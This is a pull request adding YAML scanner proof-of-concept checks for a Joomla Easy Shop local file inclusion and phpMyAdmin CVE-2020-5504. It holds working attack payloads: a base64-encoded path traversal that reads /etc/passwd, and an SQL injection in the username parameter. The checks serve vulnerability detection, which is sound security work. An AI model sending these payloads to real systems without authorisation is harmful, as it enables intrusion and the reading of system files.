### PR TITLE
Create phpmyadmin-cve-2020-5504.yml

### DIFF
--- a/pocs/joomla-lfi.yml
+++ b/pocs/joomla-lfi.yml
@@ -1,0 +1,13 @@
+name: poc-yaml-joomla-lfi
+rules:
+  - method: GET
+    path: >-
+      /index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
+    follow_redirects: true
+    expression: |
+      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: pa55w0rd(www.pa55w0rd.online/)
+  Affected Version: "Joomla! Component Easy Shop 1.2.3 - Local File Inclusion"
+  links:
+    - https://www.exploit-db.com/exploits/46219

--- a/pocs/phpmyadmin-cve-2020-5504.yml
+++ b/pocs/phpmyadmin-cve-2020-5504.yml
@@ -1,0 +1,15 @@
+name: poc-yaml-phpmyadmin-cve-2020-5504
+set:
+  r: randomInt(800000000, 1000000000)
+rules:
+  - method: GET
+    path: >-
+      /server_privileges.php?ajax_request=true&validate_username=true&username=root%27%20and%20(select%20updatexml(1,concat(0x7e,(SELECT%20md5({{r}})),0x7e),1))%20--%20
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31)))
+detail:
+  author: pa55w0rd(www.pa55w0rd.online/)
+  Affected Version: "phpMyAdmin 4.x versions prior to 4.9.4 are affected, at least as old as 4.0.0. phpMyAdmin 5.x version 5.0.0 is affected."
+  links: 
+    - https://www.phpmyadmin.net/security/PMASA-2020-1/

--- a/pocs/phpmyadmin-cve-2020-5504.yml
+++ b/pocs/phpmyadmin-cve-2020-5504.yml
@@ -11,5 +11,5 @@ rules:
 detail:
   author: pa55w0rd(www.pa55w0rd.online/)
   Affected Version: "phpMyAdmin 4.x versions prior to 4.9.4 are affected, at least as old as 4.0.0. phpMyAdmin 5.x version 5.0.0 is affected."
-  links: 
+  links:
     - https://www.phpmyadmin.net/security/PMASA-2020-1/


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的
phpmyadmin-cve-2020-5504
## 测试环境
phpMyAdmin 4.x versions prior to 4.9.4 are affected, at least as old as 4.0.0. phpMyAdmin 5.x version 5.0.0 is affected
## 备注
![image](https://user-images.githubusercontent.com/16274549/72872879-59eed800-3d29-11ea-9b56-a2a69a7a16f8.png)
